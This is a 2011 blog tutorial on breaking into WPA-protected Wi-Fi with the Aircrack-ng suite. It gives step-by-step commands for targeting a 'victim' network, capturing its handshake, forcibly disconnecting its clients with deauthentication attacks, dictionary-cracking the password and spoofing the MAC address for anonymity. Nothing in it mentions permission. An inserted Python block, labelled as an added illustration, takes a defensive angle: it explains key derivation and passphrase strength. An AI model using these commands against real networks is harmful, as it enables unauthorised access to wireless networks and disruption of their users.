Thursday 21 April 2011

How To Hack WEP/WPA With Linux

Background

I noticed a strange behaviour. A lot of people were into cracking WEP, but still had a lot of questions on WPA. After these findings, I decided to just write my own tutorial :-)
Knowledge
If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is, some don't agree. The fact is that if the password is in some sort of dictionary, it can be cracked. You'll need a 4-way handshake from a client connecting to an AP. The 4-way handshake contains keyed material derived from the password, which can be attacked with a dictionary. You'll need a huge list and some luck that the password is in it, or you can make a personal list with a password tool of your choice (like john), which will not be discussed in this tutorial ;-). For this tutorial, of course, I'll be using the Aircrack-ng suite.
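From the network owner's side, the dictionary attack works because of what the handshake is keyed with. As an added illustration (not part of the original post or of the Aircrack-ng suite), the Python below derives the WPA/WPA2-Personal PMK the way IEEE 802.11i specifies, checks it against the standard's published test vector, and puts numbers on why only dictionary guesses are feasible; the 100k guesses/second figure is an assumed throughput, not a measurement.

```python
import hashlib
import hmac
import secrets
import string

# IEEE 802.11i (Annex H) known-answer vector for the PMK derivation.
KAT_PASSPHRASE, KAT_SSID = "password", "IEEE"
KAT_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key of WPA/WPA2-Personal: PBKDF2-HMAC-SHA1 over the
    passphrase, salted with the SSID, 4096 rounds, 256-bit output. Every
    dictionary guess against a captured 4-way handshake costs one of these."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)

def known_answer_ok() -> bool:
    """Self-check against the standard's published test vector."""
    return hmac.compare_digest(wpa_pmk(KAT_PASSPHRASE, KAT_SSID).hex(), KAT_PMK_HEX)

def guess_space(alphabet_size: int, length: int) -> int:
    """Number of candidates an exhaustive (non-dictionary) search must cover."""
    return alphabet_size ** length

def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given PBKDF2 throughput."""
    return guess_space(alphabet_size, length) / guesses_per_second / (365 * 24 * 3600)

def random_passphrase(length: int = 20) -> str:
    """Mitigation: a passphrase drawn uniformly from a large alphabet appears in
    no wordlist and, at length >= 20, sits far beyond any feasible exhaustive search."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

if __name__ == "__main__":
    assert known_answer_ok()
    # Same passphrase, different SSID -> different PMK: precomputed PMK tables only work per SSID.
    print("PMK depends on SSID:", wpa_pmk("password", "IEEE") != wpa_pmk("password", "linksys"))
    # Assumed attacker throughput of 100k PBKDF2 derivations/s (a constructed figure, not measured).
    print(f"8 lowercase letters: {years_to_exhaust(26, 8, 1e5):.2f} years to exhaust")
    print(f"20 alphanumerics:    {years_to_exhaust(62, 20, 1e5):.3g} years to exhaust")
    print("example strong passphrase:", random_passphrase())
```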
Optional: laziness

sudo su
You might need root access to run these applications. For example, if you are using Ubuntu and you don't want to type "sudo" in front of every line, you could use this optional command.
Knowing what interface to use
First of all, you'll have to know the name of your wireless interface, that's why you type:
iwconfig
Identifying your victim

airmon-ng start interface
You'd get a small message saying: (monitor mode enabled on spoofedinterface). In my case, the monitor interface was "mon0".
airodump-ng spoofedinterface
The next step would be choosing your victim. Obviously we would be looking for someone with WPA encryption now, since you want to crack WPA. Write down their BSSID and CHANNEL.
Restarting the network card on the right channel

airmon-ng stop spoofedinterface
airmon-ng start interface CHANNEL
Start the dumping of the file

airodump-ng -c CHANNEL --bssid BSSID -w psk spoofedinterface
This will start airodump-ng on your specific channel (-c). It will look for handshakes of the specified BSSID and write everything to a capture file named psk (-w).
Notice! You might ask yourself: but how do I know when I've captured a handshake? Well, aircrack thought of that: if you managed to capture a handshake, a message appears in the upper right corner.
Optional, but very helpful when speeding up the process
So you need to capture a handshake, but the people who are connected of course won't be giving out the handshake, since this event only takes place during authentication. If we could just boot them for a small second off their network, so they could reconnect, that would be perfect!
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID spoofedinterface
This would do 10 "deauthentication" attacks (-0) with the AP being BSSID and the client being booted CLIENTBSSID. You can check whether a client is connected by looking at your airodump-ng screen again. If you see at the bottom of that screen that someone is connected to the ESSID of your victim, simply use that STATION BSSID as CLIENTBSSID in this example.
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap
This would crack the actual capture file that was created by airodump-ng. Notice! You can only try to crack once a handshake has actually been captured. Don't forget, -w needs the path to your wordlist, so remember where you saved it!
Optional security
As a scriptkiddy, you might want to remain a bit anonymous, so here's how you would change your MAC. Try to implement it yourself ;-)
sudo ifconfig spoofedinterface down && sudo macchanger -r interface && sudo macchanger -r spoofedinterface && sudo ifconfig spoofedinterface up
Wordlists
If you ever needed some good wordlists, I suggest checking here first: wordlists
Qkyrie
